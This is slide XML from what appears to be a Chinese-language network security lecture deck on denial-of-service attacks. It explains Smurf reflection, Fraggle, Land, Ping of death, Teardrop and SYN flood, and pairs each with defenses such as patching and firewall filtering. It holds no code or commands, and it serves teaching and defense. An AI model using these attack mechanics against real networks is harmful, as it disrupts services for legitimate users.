                  <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                </a:defRPr>
              </a:lvl3pPr>
              <a:lvl4pPr marL="1600200" indent="-228600" defTabSz="762000" eaLnBrk="0" hangingPunct="0">
                <a:defRPr>
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                </a:defRPr>
              </a:lvl4pPr>
              <a:lvl5pPr marL="2057400" indent="-228600" defTabSz="762000" eaLnBrk="0" hangingPunct="0">
                <a:defRPr>
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" panose="020B0604020202020204"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nl-NL" altLang="zh-CN" sz="2400"/>
                <a:t>.</a:t>
              </a:r>
              <a:endParaRPr lang="nl-NL" altLang="zh-CN" sz="2400"/>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fade">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5325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1+#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53290"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="61" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="53290"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="62" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="53290"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="63" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="53290"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y+.1"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>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par>
                          <p:cTn id="68" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="7000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="69" presetID="2" presetClass="entr" presetSubtype="4"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10" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="75" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="53255"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="76" dur="5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90" grpId="0" animBg="1"/>
      <p:bldP spid="532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Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Resources </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>and their </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400">
              <a:solidFill>
                <a:srgbClr val="000066"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68610" name="日期占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5129336" y="6407944"/>
            <a:ext cx="1026840"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B5FB781-41C9-46F4-A49A-ED8F387674A3}" type="datetime1">
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1000" smtClean="0"/>
            </a:fld>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1000" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68611" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="1995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6211" name="Object 3"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="178249" y="1844824"/>
          <a:ext cx="8786239" cy="4680520"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s622685" name="Visio" r:id="rId1" imgW="8585200" imgH="4673600" progId="Visio.Drawing.11">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Visio" r:id="rId1" imgW="8585200" imgH="4673600" progId="Visio.Drawing.11">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name="图片 6226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49" y="1844824"/>
                        <a:ext cx="8786239" cy="4680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606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7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>者找出网络上有哪些路由器会回应</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>请求</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>以受害者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>地址为源地址</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>向路由器的广播地址</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>发</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>ICMP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Echo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Ping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>）包</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>路由器广播该</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Ping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>包到子网络中所有设备</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>收到广播的设备同时向受害者应答（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>广播源地址</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>ICMP Echo-Reply</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>受害者主机会被这些大量的应答包淹没</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="300034" name="Rectangle 1026"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Smurf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>（反射攻击）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70659" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{EF15334E-6EA9-4E71-B262-C00490E293C9}"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prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{726294F7-79F4-473C-A520-F1A38CB1F4C1}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="301058" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Smurf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>攻击示意图</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="394240" name="Object 0"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="35496" y="1052737"/>
          <a:ext cx="4608512" cy="3328760"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s645191" name="位图图像" r:id="rId1" imgW="4219575" imgH="3048000" progId="PBrush">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="位图图像" r:id="rId1" imgW="4219575" imgH="3048000" progId="PBrush">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name="图片 645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2737"/>
                        <a:ext cx="4608512" cy="3328760"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect">
                        <a:avLst/>
                      </a:prstGeom>
                      <a:noFill/>
                      <a:ln>
                        <a:noFill/>
                      </a:ln>
                      <a:effectLst/>
                    </p:spPr>
                  </p:pic>
                </p:oleObj>
              </mc:Fallback>
            </mc:AlternateContent>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="6" name="Object 2"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3775811" y="3950336"/>
          <a:ext cx="5368082" cy="2888769"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s645192" name="BMP 图象" r:id="rId3" imgW="4391025" imgH="2171700" progId="Paint.Picture">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="BMP 图象" r:id="rId3" imgW="4391025" imgH="2171700" progId="Paint.Picture">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name="图片 645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811" y="3950336"/>
                        <a:ext cx="5368082" cy="2888769"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect">
                        <a:avLst/>
                      </a:prstGeom>
                      <a:noFill/>
                      <a:ln>
                        <a:noFill/>
                      </a:ln>
                    </p:spPr>
                  </p:pic>
                </p:oleObj>
              </mc:Fallback>
            </mc:AlternateContent>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pull/>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mtClean="0"/>
              <a:t>与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Smurf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>攻击类似，但它使用的不是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>，而是 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>UDP Echo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>防范 ：在防火墙上过滤</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>UDP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>应答消息</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="标题 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Fraggle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>攻击 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>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77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Land</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>补丁，加固协议栈，丢弃源、目的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>相同的包</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Ping of death</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>打补丁</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>防火墙拦截</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Teardrop</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>加入条件判断，对这种异常的包特殊处理</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>打补丁</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Smurf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>拦截广播</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>SYN Flood</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>拦截困难</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>抗击打</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>DOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>防御</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="灯片编号占位符 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A14BEF07-BD7B-49AC-8394-8967A3627B43}"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normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>DoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>攻击一对一方式</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>早期效果明显：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>随着攻击目标抗击打能力提升（对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>恶意攻击包“消化能力”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>加强），</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>DoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>攻击的困难程度</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>加大：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>计算机处理能力增长，内存增加，千兆级别网络，，</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>如攻击软件每秒发送</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>3,000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>个攻击包，目标主机与网络带宽每秒可处理</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>10,000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>个攻击包，这样一来攻击就不会产生什么效果。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3074" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>DDOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>产生的背景</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pull/>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normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>者通过某种手段，导致目标机器或网络停止向合法用户提供</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>正常服务</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>或资源</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>访问。 </a:t>
            </a:r>
